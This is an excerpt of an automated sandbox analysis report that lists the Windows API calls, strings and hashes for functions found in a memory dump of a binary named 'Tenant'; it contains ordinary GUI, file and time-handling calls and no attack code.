                                                                                        • SetWindowTextW.USER32(?,?), ref: 00AFCBD3
                                                                                        • GetDlgItem.USER32(?,000003EA), ref: 00AFCBE8
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00AFCBEE
                                                                                        • GetDlgItem.USER32(?,000003E9), ref: 00AFCBFE
                                                                                        • SetWindowTextW.USER32(00000000,?), ref: 00AFCC04
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000CC,?,00000000), ref: 00AFCC25
                                                                                        • SendDlgItemMessageW.USER32(?,000003E9,000000C5,00000000,00000000), ref: 00AFCC3F
                                                                                        • GetWindowRect.USER32(?,?), ref: 00AFCC48
                                                                                        • SetWindowTextW.USER32(?,?), ref: 00AFCCB3
                                                                                        • GetDesktopWindow.USER32 ref: 00AFCCB9
                                                                                        • GetWindowRect.USER32(00000000), ref: 00AFCCC0
                                                                                        • MoveWindow.USER32(?,?,?,?,00000000,00000000), ref: 00AFCD0C
                                                                                        • GetClientRect.USER32(?,?), ref: 00AFCD19
                                                                                        • PostMessageW.USER32(?,00000005,00000000,00000000), ref: 00AFCD3E
                                                                                        • SetTimer.USER32(?,0000040A,00000000,00000000), ref: 00AFCD69
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$ItemMessageText$RectSend$ClientDesktopIconLoadMovePostTimer
                                                                                        • String ID:
                                                                                        • API String ID: 3869813825-0
                                                                                        • Opcode ID: e7bf9cdcf5e2e032b85ae5bf35ccac663937097c3d6f95e0c63f5c09be73f4b1
                                                                                        • Instruction ID: 6c44c38fc23dda77a60fe7c227fc0afa6977b31e7b8af1b15ffd1dc497a3d497
                                                                                        • Opcode Fuzzy Hash: e7bf9cdcf5e2e032b85ae5bf35ccac663937097c3d6f95e0c63f5c09be73f4b1
                                                                                        • Instruction Fuzzy Hash: C6515D7090070DEFDB20AFA9CE86B6EBBB5FF04715F100918F686A35A0CB75A915CB50
                                                                                        Function 00B2A7DE Relevance: 24.7, APIs: 12, Strings: 2, Instructions: 205windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • _memset.LIBCMT ref: 00B2A87E
                                                                                        • DestroyWindow.USER32(?,?), ref: 00B2A8F8
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00000000,?), ref: 00B2A972
                                                                                        • SendMessageW.USER32(00000000,00000433,00000000,00000030), ref: 00B2A994
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2A9A7
                                                                                        • DestroyWindow.USER32(00000000), ref: 00B2A9C9
                                                                                        • CreateWindowExW.USER32(00000008,tooltips_class32,00000000,?,80000000,80000000,80000000,80000000,?,00000000,00AA0000,00000000), ref: 00B2AA00
                                                                                        • SendMessageW.USER32(00000000,00000432,00000000,00000030), ref: 00B2AA19
                                                                                        • GetDesktopWindow.USER32 ref: 00B2AA32
                                                                                        • GetWindowRect.USER32(00000000), ref: 00B2AA39
                                                                                        • SendMessageW.USER32(00000000,00000418,00000000,?), ref: 00B2AA51
                                                                                        • SendMessageW.USER32(00000000,00000421,?,00000000), ref: 00B2AA69
                                                                                          • Part of subcall function 00AA29AB: GetWindowLongW.USER32(?,000000EB), ref: 00AA29BC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Window$MessageSend$CreateDestroy$DesktopLongRect_memmove_memset
                                                                                        • String ID: 0$tooltips_class32
                                                                                        • API String ID: 1297703922-3619404913
                                                                                        • Opcode ID: 20829b00c811d06b749c6efd8c4d07ce82345bd4c8f5b641f77252f0f98c7cd1
                                                                                        • Instruction ID: f8fe10eccd2d9365b63be230d8e204da56cb2135dd11c38bb99898559f5ccaa3
                                                                                        • Opcode Fuzzy Hash: 20829b00c811d06b749c6efd8c4d07ce82345bd4c8f5b641f77252f0f98c7cd1
                                                                                        • Instruction Fuzzy Hash: 6F71A871150200AFD721DF28DC5AF6A7BE9FB89304F14059DF98A872A1DB78AD41CB52
                                                                                        Function 00B2CCA6 Relevance: 24.7, APIs: 11, Strings: 3, Instructions: 181windowfileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA29E2: GetWindowLongW.USER32(?,000000EB), ref: 00AA29F3
                                                                                        • DragQueryPoint.SHELL32(?,?), ref: 00B2CCCF
                                                                                          • Part of subcall function 00B2B1A9: ClientToScreen.USER32(?,?), ref: 00B2B1D2
                                                                                          • Part of subcall function 00B2B1A9: GetWindowRect.USER32(?,?), ref: 00B2B248
                                                                                          • Part of subcall function 00B2B1A9: PtInRect.USER32(?,?,00B2C6BC), ref: 00B2B258
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00B2CD38
                                                                                        • DragQueryFileW.SHELL32(?,000000FF,00000000,00000000), ref: 00B2CD43
                                                                                        • DragQueryFileW.SHELL32(?,00000000,?,00000104), ref: 00B2CD66
                                                                                        • _wcscat.LIBCMT ref: 00B2CD96
                                                                                        • SendMessageW.USER32(?,000000C2,00000001,?), ref: 00B2CDAD
                                                                                        • SendMessageW.USER32(?,000000B0,?,?), ref: 00B2CDC6
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CDDD
                                                                                        • SendMessageW.USER32(?,000000B1,?,?), ref: 00B2CDFF
                                                                                        • DragFinish.SHELL32(?), ref: 00B2CE06
                                                                                        • DefDlgProcW.USER32(?,00000233,?,00000000,?,?,?), ref: 00B2CEF9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: MessageSend$Drag$Query$FileRectWindow$ClientFinishLongPointProcScreen_wcscat
                                                                                        • String ID: @GUI_DRAGFILE$@GUI_DRAGID$@GUI_DROPID
                                                                                        • API String ID: 169749273-3440237614
                                                                                        • Opcode ID: ddd101eb3b8cb5134fd29e065fc3744467b6da16ad69d5c4856a963d38a7c322
                                                                                        • Instruction ID: 7f0ceb37c0b6b9b195b4490edbfa923bb2c80a20b1c32e636cdc796be600fee7
                                                                                        • Opcode Fuzzy Hash: ddd101eb3b8cb5134fd29e065fc3744467b6da16ad69d5c4856a963d38a7c322
                                                                                        • Instruction Fuzzy Hash: 43617971108301AFC711EF60DC95E9FBBE8EF89750F100A6DF595932A1DB71AA09CB52
                                                                                        Function 00B082D5 Relevance: 23.1, APIs: 11, Strings: 2, Instructions: 378timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00B0831A
                                                                                        • VariantCopy.OLEAUT32(00000000,?), ref: 00B08323
                                                                                        • VariantClear.OLEAUT32(00000000), ref: 00B0832F
                                                                                        • VariantTimeToSystemTime.OLEAUT32(?,?,?), ref: 00B0841D
                                                                                        • __swprintf.LIBCMT ref: 00B0844D
                                                                                        • VarR8FromDec.OLEAUT32(?,?), ref: 00B08479
                                                                                        • VariantInit.OLEAUT32(?), ref: 00B0852A
                                                                                        • SysFreeString.OLEAUT32(?), ref: 00B085BE
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B08618
                                                                                        • VariantClear.OLEAUT32(?), ref: 00B08627
                                                                                        • VariantInit.OLEAUT32(00000000), ref: 00B08665
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Variant$ClearInit$Time$CopyFreeFromStringSystem__swprintf
                                                                                        • String ID: %4d%02d%02d%02d%02d%02d$Default
                                                                                        • API String ID: 3730832054-3931177956
                                                                                        • Opcode ID: 8ed15555a8169264c563c0c31e11097f971e9d0ceabfc421c0c462721a710f8c
                                                                                        • Instruction ID: ad0791983bdddf572dd68b4bfa16ee0a47007b824d739a89ad294f95fc188ddc
                                                                                        • Opcode Fuzzy Hash: 8ed15555a8169264c563c0c31e11097f971e9d0ceabfc421c0c462721a710f8c
                                                                                        • Instruction Fuzzy Hash: 16D1BB31604615DBCB249B65C894B6EBBF8FF45B00F248199F599AB2C1DF30EE40DBA4
                                                                                        Function 00B249CF Relevance: 23.0, APIs: 2, Strings: 11, Instructions: 251windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CharUpperBuffW.USER32(?,?), ref: 00B24A61
                                                                                        • SendMessageW.USER32(?,00001105,00000000,00000000), ref: 00B24AAC
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: BuffCharMessageSendUpper
                                                                                        • String ID: CHECK$COLLAPSE$EXISTS$EXPAND$GETITEMCOUNT$GETSELECTED$GETTEXT$GETTOTALCOUNT$ISCHECKED$SELECT$UNCHECK
                                                                                        • API String ID: 3974292440-4258414348
                                                                                        • Opcode ID: 45ca7f5e5523e4b12cac716d2989d60000926b8bbd202d7dce40f33b1b807f5f
                                                                                        • Instruction ID: 211d5d58902684dddac9da126c9b490cd6f3739f4a0158ece9ef846e33278c24
                                                                                        • Opcode Fuzzy Hash: 45ca7f5e5523e4b12cac716d2989d60000926b8bbd202d7dce40f33b1b807f5f
                                                                                        • Instruction Fuzzy Hash: EA919D742047119FCB04EF20C591A6EB7E1EF95354F10899CF89A5B7A2CB71ED0ACB81
                                                                                        Function 00B0E25D Relevance: 22.9, APIs: 12, Strings: 1, Instructions: 185timeCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetLocalTime.KERNEL32(?), ref: 00B0E31F
                                                                                        • SystemTimeToFileTime.KERNEL32(?,?), ref: 00B0E32F
                                                                                        • LocalFileTimeToFileTime.KERNEL32(?,?), ref: 00B0E33B
                                                                                        • __wsplitpath.LIBCMT ref: 00B0E399
                                                                                        • _wcscat.LIBCMT ref: 00B0E3B1
                                                                                        • _wcscat.LIBCMT ref: 00B0E3C3
                                                                                        • GetCurrentDirectoryW.KERNEL32(00007FFF,?), ref: 00B0E3D8
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0E3EC
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0E41E
                                                                                        • SetCurrentDirectoryW.KERNEL32(?), ref: 00B0E43F
                                                                                        • _wcscpy.LIBCMT ref: 00B0E44B
                                                                                        • SetCurrentDirectoryW.KERNEL32(?,?,?,?,?), ref: 00B0E48A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CurrentDirectoryTime$File$Local_wcscat$System__wsplitpath_wcscpy
                                                                                        • String ID: *.*
                                                                                        • API String ID: 3566783562-438819550
                                                                                        • Opcode ID: cdb519079ec4dee5579799a10b73449d9fc25f5bf53067e8469393607a611d75
                                                                                        • Instruction ID: 1750a0a2bc7f5de311db7aec55cc211f23b51b9680bc12225a8de4f9f0f8cb1e
                                                                                        • Opcode Fuzzy Hash: cdb519079ec4dee5579799a10b73449d9fc25f5bf53067e8469393607a611d75
                                                                                        • Instruction Fuzzy Hash: B86147725042059FC710EF60C984A9FB7E8FF89310F04895EF99987291EB35E945CB92
                                                                                        Function 00B0A27B Relevance: 22.9, APIs: 7, Strings: 6, Instructions: 150COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • LoadStringW.USER32(00000066,?,00000FFF,?), ref: 00B0A2C2
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • LoadStringW.USER32(00000072,?,00000FFF,?), ref: 00B0A2E3
                                                                                        • __swprintf.LIBCMT ref: 00B0A33C
                                                                                        • __swprintf.LIBCMT ref: 00B0A355
                                                                                        • _wprintf.LIBCMT ref: 00B0A3FC
                                                                                        • _wprintf.LIBCMT ref: 00B0A41A
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: LoadString__swprintf_wprintf$_memmove
                                                                                        • String ID: Error: $"%s" (%d) : ==> %s:$"%s" (%d) : ==> %s:%s%s$Incorrect parameters to object property !$Line %d (File "%s"):$^ ERROR
                                                                                        • API String ID: 311963372-3080491070
                                                                                        • Opcode ID: 6aa893699216343e4e0e56036286048fa4511ba1f095cd4fdef243023f86817f
                                                                                        • Instruction ID: 251e7b1afa46f20f3497098e2414fbf7b9584cd2815181d8252963fcc1d6518f
                                                                                        • Opcode Fuzzy Hash: 6aa893699216343e4e0e56036286048fa4511ba1f095cd4fdef243023f86817f
                                                                                        • Instruction Fuzzy Hash: C4518172900209AACF14EBE0DE66EEEB7B8EF14340F500195F405721A2EF752F58CB51
                                                                                        Function 00B00065 Relevance: 22.9, APIs: 8, Strings: 5, Instructions: 138windowCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetModuleHandleW.KERNEL32(00000000,?,00000FFF,00000000,00000001,00000000,?,00AEF8B8,00000001,0000138C,00000001,00000000,00000001,?,00B13FF9,00000000), ref: 00B0009A
                                                                                        • LoadStringW.USER32(00000000,?,00AEF8B8,00000001), ref: 00B000A3
                                                                                          • Part of subcall function 00AB1A36: _memmove.LIBCMT ref: 00AB1A77
                                                                                        • GetModuleHandleW.KERNEL32(00000000,00B67310,?,00000FFF,?,?,00AEF8B8,00000001,0000138C,00000001,00000000,00000001,?,00B13FF9,00000000,00000001), ref: 00B000C5
                                                                                        • LoadStringW.USER32(00000000,?,00AEF8B8,00000001), ref: 00B000C8
                                                                                        • __swprintf.LIBCMT ref: 00B00118
                                                                                        • __swprintf.LIBCMT ref: 00B00129
                                                                                        • _wprintf.LIBCMT ref: 00B001D2
                                                                                        • MessageBoxW.USER32(00000000,?,?,00011010), ref: 00B001E9
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: HandleLoadModuleString__swprintf$Message_memmove_wprintf
                                                                                        • String ID: Error: $%s (%d) : ==> %s: %s %s$Line %d (File "%s"):$Line %d:$^ ERROR
                                                                                        • API String ID: 984253442-2268648507
                                                                                        • Opcode ID: adb433253301fffa19edd0cfaa33f6c97c09c0692e81ea3b02cf9ffaafa7ff22
                                                                                        • Instruction ID: 2f0b99edbbb7624f2597f2ddd5f8fa9124b2148ce27733aae0da1cbf6f52ba89
                                                                                        • Opcode Fuzzy Hash: adb433253301fffa19edd0cfaa33f6c97c09c0692e81ea3b02cf9ffaafa7ff22
                                                                                        • Instruction Fuzzy Hash: 2D413E72800119AACF14FBE0DEA6EEEB7BCAF14341F5001A5F505B2092EE356F49CB61
                                                                                        Function 00B0A995 Relevance: 22.9, APIs: 5, Strings: 8, Instructions: 138COMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                          • Part of subcall function 00AA4D37: __itow.LIBCMT ref: 00AA4D62
                                                                                          • Part of subcall function 00AA4D37: __swprintf.LIBCMT ref: 00AA4DAC
                                                                                        • CharLowerBuffW.USER32(?,?), ref: 00B0AA0E
                                                                                        • GetDriveTypeW.KERNEL32 ref: 00B0AA5B
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0AAA3
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0AADA
                                                                                        • mciSendStringW.WINMM(?,00000000,00000000,00000000), ref: 00B0AB08
                                                                                          • Part of subcall function 00AB1821: _memmove.LIBCMT ref: 00AB185B
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: SendString$BuffCharDriveLowerType__itow__swprintf_memmove
                                                                                        • String ID: type cdaudio alias cd wait$ wait$close$close cd wait$closed$open$open $set cd door
                                                                                        • API String ID: 2698844021-4113822522
                                                                                        • Opcode ID: 326417ecfa667e176b47f7b1173e1d4811676b7e769f6c47cb80cdc7bcbe9fee
                                                                                        • Instruction ID: e8242fae8d5f24d1833aca53430f74816103644d1ac18248f32dd84bd8cc94ca
                                                                                        • Opcode Fuzzy Hash: 326417ecfa667e176b47f7b1173e1d4811676b7e769f6c47cb80cdc7bcbe9fee
                                                                                        • Instruction Fuzzy Hash: 74514D711043059FC701EF20C991D6AB7E8FF98758F50499DF896572A2DB31EE09CB92
                                                                                        Function 00B0A832 Relevance: 22.9, APIs: 10, Strings: 3, Instructions: 102fileCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 00B0A852
                                                                                        • __swprintf.LIBCMT ref: 00B0A874
                                                                                        • CreateDirectoryW.KERNEL32(?,00000000), ref: 00B0A8B1
                                                                                        • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 00B0A8D6
                                                                                        • _memset.LIBCMT ref: 00B0A8F5
                                                                                        • _wcsncpy.LIBCMT ref: 00B0A931
                                                                                        • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 00B0A966
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B0A971
                                                                                        • RemoveDirectoryW.KERNEL32(?), ref: 00B0A97A
                                                                                        • CloseHandle.KERNEL32(00000000), ref: 00B0A984
                                                                                        Strings
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                                                        • String ID: :$\$\??\%s
                                                                                        • API String ID: 2733774712-3457252023
                                                                                        • Opcode ID: 19160b27521646db535b77c3fec766877be9c65b967ce8e4ea00c81680c8d274
                                                                                        • Instruction ID: 09852851fa019dafc0ba7e846512292743fb44e5d716b2f7c48fd8d2e62f3218
                                                                                        • Opcode Fuzzy Hash: 19160b27521646db535b77c3fec766877be9c65b967ce8e4ea00c81680c8d274
                                                                                        • Instruction Fuzzy Hash: 6B31817251021AABDB219FA0DC49FEF77BCEF89700F2045E6F509D61A0EB709645CB25
                                                                                        Function 00B2C0A5 Relevance: 22.6, APIs: 15, Instructions: 130filecommemoryCOMMON
                                                                                        Download Yara Rule
                                                                                        APIs
                                                                                        • CreateFileW.KERNEL32(00000000,80000000,00000000,00000000,00000003,00000000,00000000,00000000,?,?,?,?,?,00B2982C,?,?), ref: 00B2C0C8
                                                                                        • GetFileSize.KERNEL32(00000000,00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C0DF
                                                                                        • GlobalAlloc.KERNEL32(00000002,00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C0EA
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C0F7
                                                                                        • GlobalLock.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C100
                                                                                        • ReadFile.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C10F
                                                                                        • GlobalUnlock.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C118
                                                                                        • CloseHandle.KERNEL32(00000000,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C11F
                                                                                        • CreateStreamOnHGlobal.OLE32(00000000,00000001,?,?,?,?,?,00B2982C,?,?,00000000,?), ref: 00B2C130
                                                                                        • OleLoadPicture.OLEAUT32(?,00000000,00000000,00B33C7C,?), ref: 00B2C149
                                                                                        • GlobalFree.KERNEL32(00000000), ref: 00B2C159
                                                                                        • GetObjectW.GDI32(00000000,00000018,?), ref: 00B2C17D
                                                                                        • CopyImage.USER32(00000000,00000000,?,?,00002000), ref: 00B2C1A8
                                                                                        • DeleteObject.GDI32(00000000), ref: 00B2C1D0
                                                                                        • SendMessageW.USER32(?,00000172,00000000,00000000), ref: 00B2C1E6
                                                                                        Memory Dump Source
                                                                                        • Source File: 0000000B.00000002.4068879249.0000000000AA1000.00000020.00000001.01000000.00000006.sdmp, Offset: 00AA0000, based on PE: true
                                                                                        • Associated: 0000000B.00000002.4068857733.0000000000AA0000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B30000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068931266.0000000000B56000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4068982580.0000000000B60000.00000004.00000001.01000000.00000006.sdmpDownload File
                                                                                        • Associated: 0000000B.00000002.4069002034.0000000000B69000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                                                        Joe Sandbox IDA Plugin
                                                                                        • Snapshot File: hcaresult_11_2_aa0000_Tenant.jbxd
                                                                                        Similarity
                                                                                        • API ID: Global$File$CloseCreateHandleObject$AllocCopyDeleteFreeImageLoadLockMessagePictureReadSendSizeStreamUnlock
                                                                                        • String ID:
                                                                                        • API String ID: 3840717409-0
                                                                                        • Opcode ID: 34f03f8bcdd9cda3c163db887b9c1121fc337d5ab822530a45654d195423fca4
                                                                                        • Instruction ID: 41f5ab24d5b261d49c3e94036791aaed6009d7fe30893ad194b497bc853f9e06
                                                                                        • Opcode Fuzzy Hash: 34f03f8bcdd9cda3c163db887b9c1121fc337d5ab822530a45654d195423fca4
                                                                                        • Instruction Fuzzy Hash: C8413B75640218EFDB21AF65DC88EAF7BB8EF89711F204098F909E7260DB319D41DB60
